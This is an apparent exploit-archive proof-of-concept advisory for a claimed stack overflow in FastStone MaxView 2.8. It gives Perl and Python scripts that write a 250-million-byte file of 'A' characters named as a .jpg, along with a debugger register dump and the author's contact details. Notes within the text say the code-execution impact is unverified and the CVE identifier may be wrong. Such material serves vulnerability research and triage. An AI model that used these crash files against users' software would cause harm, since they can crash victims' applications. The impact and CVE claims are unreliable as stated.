FastStone MaxView version 2.8 local stack overflow proof of concept exploit.
72fb1cd5dc6cdd6a17b2ac6a91665e7e247d5d6d7269f84cfc3e0a9b158410b9
#######################################################################
# Title : FastStone MaxView 2.8 (.jpg) local Stack Overflow PoC
# Program : FastStone MaxView
# Author : Dr.3v1l
# Date : 2015 01 July
# Website : http://www.faststone.org
# Download : http://www.faststonesoft.net/DN/FSMaxViewSetup28.exe
# Version : 2.8
# Type : (.jpg File) local Stack Overflow PoC
#######################################################################
#
# 01. Vulnerability Information
#
# Class: Buffer overflow [CWE-119]
# Impact: Code execution
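# Remotely Exploitable: No
# Locally Exploitable: Yes (triggered when a user opens a crafted .jpg file
# in the viewer, so the file itself may still arrive by e-mail or download)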
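# CVE Name: CVE-2014-8386 (as given by the author; verify against the CVE
# record that this identifier is assigned to FastStone MaxView before using
# it for tracking)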
#
# 02. Technical Description / Proof of Concept Code
#
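# This vulnerability is caused by a stack buffer overflow when parsing
# the display properties parameter. A malicious third party could trigger
# execution of arbitrary code within the context of the application, or
# otherwise crash the whole application.
#
# Note: in the register dump below, EAX points at the "A" filler while EIP
# is inside ntdll.KiFastSystemCallRet, so the dump shows attacker-supplied
# data in memory but not an overwritten return address. The PoC file is
# 250,000,000 filler bytes with no JPEG structure; the code-execution impact
# is therefore unverified here, and the root cause should be confirmed under
# a debugger before triage.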
#
# EAX 54A30018 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# ECX 0013D2A8
# EDX 7767D370 ntdll.KiFastSystemCallRet
# EBX 00000000
# ESP 0013D2A8
# EBP 0013D30C
# ESI 0013D328
# EDI 000007A4
# EIP 7767D370 ntdll.KiFastSystemCallRet
# C 0 ES 0023 32bit 0(FFFFFFFF)
# P 1 CS 001B 32bit 0(FFFFFFFF)
# A 0 SS 0023 32bit 0(FFFFFFFF)
# Z 1 DS 0023 32bit 0(FFFFFFFF)
# S 0 FS 003B 32bit 7FFDF000(4000)
# T 0 GS 0000 NULL
# D 0
# O 0 LastErr ERROR_SUCCESS (00000000)
# EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE)
# ST0 empty -??? FFFF 000000FF 00FF00FF
# ST1 empty 4.7021112344749837450e+18
# ST2 empty 4.7021112344749837450e+18
# ST3 empty 4.7021112344749837450e+18
# ST4 empty 4.7021112344749837450e+18
# ST5 empty 4.7021112344749837450e+18
# ST6 empty 4.7021112344749837450e+18
# ST7 empty 4.7021112344749837450e+18
# 3 2 1 0 E S P U O Z D I
# FST 4000 Cond 1 0 0 0 Err 0 0 0 0 0 0 0 0 (EQ)
# FCW 127F Prec NEAR,53 Mask 1 1 1 1 1 1
#
# ---------------------------------------------------------------------
#
# PoC (PERL) :
#
# my $file="3v1l.jpg";
# open(my $FILE, ">>$file") or die "Cannot open $file: $!";
# print $FILE "\x41" x 250000000;
# close($FILE);
# print "$file has been created \n";
#
#
# PoC (PYTHON) :
#
# file="3v1l.jpg"
# junk="\x41"*250000000
# writeFile = open (file, "w")
# writeFile.write(junk)
# writeFile.close()
#
#######################################################################
#
# [+] Contact Me :
#
# B.Devils.B@gmail.com
# Twitter.com/Doctor_3v1l
# Twitter.com/blackdevilsb0ys
# Facebook.com/blackdevilsb0ys
# Linkedin.com/in/hossein3v1l
# Hossein Hezami - Black_Devils B0ys
#
#######################################################################
# Black_Devils B0ys - blackdevilsb0ys.ir
#######################################################################